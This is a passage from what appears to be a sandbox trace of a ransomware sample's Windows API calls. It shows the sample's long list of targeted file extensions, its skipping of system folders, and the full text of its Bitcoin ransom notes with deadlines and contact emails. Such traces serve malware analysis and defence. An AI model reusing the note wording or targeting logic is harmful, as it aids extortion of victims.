p1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0195.316] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x84aeda3c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0
	[0195.316] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0195.316] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0195.316] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\OneDrive" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\OneDrive") returned="C:\\Users\\RDhJ0CNFevzX\\OneDrive"
	[0195.316] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\OneDrive", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*.*"
	[0195.316] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.316] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.316] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\HELP_DECRYPT_YOUR_FILES.TXT") returned 58
	[0195.316] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\onedrive\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0195.339] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0195.339] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0195.341] CloseHandle (hObject=0x380) returned 1
	[0195.352] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.352] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.352] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0195.353] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0195.353] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\onedrive\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0195.353] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0195.353] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0195.353] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0195.353] CloseHandle (hObject=0x380) returned 1
	[0195.354] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.354] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.354] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0195.354] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\HELP_DECRYPT_YOUR_FILES.HTML") returned 59
	[0195.354] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\onedrive\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0195.354] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0195.355] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0195.356] CloseHandle (hObject=0x380) returned 1
	[0195.356] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.356] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.356] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.356] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0195.357] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0195.357] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\onedrive\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0195.358] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0195.358] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0195.358] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0195.358] CloseHandle (hObject=0x380) returned 1
	[0195.358] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\onedrive\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8df96d5e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0195.358] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*.*") returned 34
	[0195.358] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.359] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*.*", cchLength=0x22 | out: lpsz="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*") returned 0x22
	[0195.359] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.359] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="windows") returned 0x0
	[0195.359] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.359] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="boot") returned 0x0
	[0195.359] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.359] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="system volume information") returned 0x0
	[0195.359] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.359] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0195.359] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.360] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="temp") returned 0x0
	[0195.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.360] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="program files") returned 0x0
	[0195.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.360] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="program files (x86)") returned 0x0
	[0195.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.360] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="appdata") returned 0x0
	[0195.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.360] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="application data") returned 0x0
	[0195.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.360] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="winnt") returned 0x0
	[0195.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.361] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="tmp") returned 0x0
	[0195.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.361] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="cache") returned 0x0
	[0195.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.361] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="temporary internet files") returned 0x0
	[0195.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.361] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="webcache") returned 0x0
	[0195.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.361] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="inetcache") returned 0x0
	[0195.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.362] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="nvidia") returned 0x0
	[0195.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.362] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="packages") returned 0x0
	[0195.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.362] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="cookies") returned 0x0
	[0195.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.362] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="programdata") returned 0x0
	[0195.362] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0195.363] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0195.363] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8df96d5e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0195.363] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0195.363] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x84aeda3c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0195.363] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8df96d5e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8df96d5e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8df96d5e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0195.363] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8df4a8ec, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8df4a8ec, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8df70b3e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0195.363] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8df4a8ec, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8df4a8ec, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8df70b3e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0195.363] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0195.363] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0195.364] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb81e0f6a, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xb81e0f6a, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1
	[0195.364] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1
	[0195.364] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1
	[0195.364] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0195.364] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0195.364] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Pictures" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures"
	[0195.364] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures"
	[0195.365] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.365] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.365] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\*.*"
	[0195.365] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x891a8d32, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x891a8d32, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0195.365] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\*.*") returned 34
	[0195.365] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.366] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\*.*", cchLength=0x22 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\*.*") returned 0x22
	[0195.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.366] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="windows") returned 0x0
	[0195.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.366] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="boot") returned 0x0
	[0195.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.366] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="system volume information") returned 0x0
	[0195.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.367] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0195.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.367] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="temp") returned 0x0
	[0195.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.367] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\*.*", lpSrch="program files") returned 0x0
	[0195.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
